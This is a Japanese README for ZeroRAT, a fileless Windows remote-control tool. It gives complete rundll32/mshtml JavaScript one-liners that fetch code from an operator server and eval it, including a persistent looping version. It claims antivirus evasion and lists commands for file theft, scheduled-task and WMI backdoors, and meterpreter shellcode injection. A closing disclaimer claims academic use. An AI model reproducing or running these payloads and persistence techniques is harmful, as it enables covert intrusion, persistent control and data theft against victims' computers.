
ZeroRATはWindows上で動作するワンライナー遠隔操作ツールです。
Windows用の遠隔制御ツールです。クライアントは1つのコマンドを実行するだけで、Windowsのネイティブプログラムを使用し、ディスクにファイルを書き込みません。自然に免殺(アンチウイルス検知回避)の特性を持っています。再起動すると無効になります。
プログラム内のdownloadとuploadは、すべてクライアントの視点です。クライアントがサーバーからファイルをダウンロードすることをdownload、クライアントがサーバーにファイルをアップロードすることをuploadと呼びます。
config.pyでクライアントの接続先アドレスと管理パスワードを変更します。debugをオフにすることを忘れずに確認してください。
プログラムはflaskとsqlite3に依存しています。pipでインストールしてください。
<ip>:<port>を実際の接続先に置き換えてください。
通常版
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://<ip>:<port>/connect",false);try{h.Send();B=h.ResponseText;eval(B);}catch(e){window.close();}
永続版
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://<ip>:<port>/connect",false);while(1){try{h.Send();B=h.ResponseText;eval(B);}catch(e){}}
管理画面: http://<ip>:<port>/server/
サーバーがサポートするコマンドは以下の通りです
sessions アクティブなクライアントを一覧表示use <id> IDでクライアントを選択set <key> <value> グローバル変数を設定show globals/downloads/uploads グローバル変数、クライアントがダウンロード可能なファイル、クライアントがアップロードしたファイルを表示delete session 現在のクライアントを削除delete download/upload <id> IDでファイルを削除upfile ファイルをサーバーにアップロードし、downloadsリストに追加download download_fileとdownload_save_pathの2つの変数を設定すると、クライアントがファイルをダウンロードし、download_save_pathに保存しますupload upload_file変数を設定すると、クライアントがupload_fileのファイルをサーバーにアップロードしますbackdoor tasks <time> Windowsタスクスケジューラを利用してバックドアを仕込みます。時間形式は00:00backdoor wmi WMIを利用してバックドアを仕込みます。1時間ごとに実行meterpreter shellcode InstallUtilを使用してshellcodeでmeterpreterを埋め込みます。事前にLHOSTとLPORTを設定する必要があります(migrate後でないとコマンドを受け付けません。.NET Framework 2.0が必要)上記のコマンド以外は、すべてWindowsシステムコマンドとして実行されます。
コマンドの詳細は/static/js/xkcd_cli.jsを参照してください。
管理画面コマンドはクライアント側で管理 /static/js/xkcd_cli.js
管理画面コマンドはサーバー側で管理 /controllers/server.py
クライアント側の管理 /controllers/client.py
クライアントペイロード生成 payload.py
データベース操作関連 /models/
md5_salt [AT] qq.com
https://gist.github.com/subTee/f1603fa5c15d5f8825c0
http://drops.wooyun.org/tips/11764
http://drops.wooyun.org/tips/8290
http://drops.wooyun.org/tips/12354
https://github.com/chromakode/xkcdfools
http://www.kammerl.de/ascii/AsciiSignature.php
https://github.com/AlessandroZ/LaZagne
本ツールを使用する際は、現地の法律を遵守し、学術テスト目的のみに使用してください。他人のコンピュータを不正に制御することは固く禁じられています。損害が発生した場合、作者は一切の責任を負いません。
GPLV3
meterpreter powershell PowerShell方式でmeterpreterを埋め込みます(PowerShell 1.0が必要)